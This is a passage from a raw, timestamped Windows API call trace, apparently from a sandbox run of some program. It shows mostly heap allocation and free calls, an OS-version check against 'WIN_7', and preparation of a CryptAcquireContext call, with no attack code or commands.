hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.569] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.570] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.570] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0254.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0254.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.571] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0254.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.572] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.573] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0254.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0254.575] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0254.575] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.575] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0254.576] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.576] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.576] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0254.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0254.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0254.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0254.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0254.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0254.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0254.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) 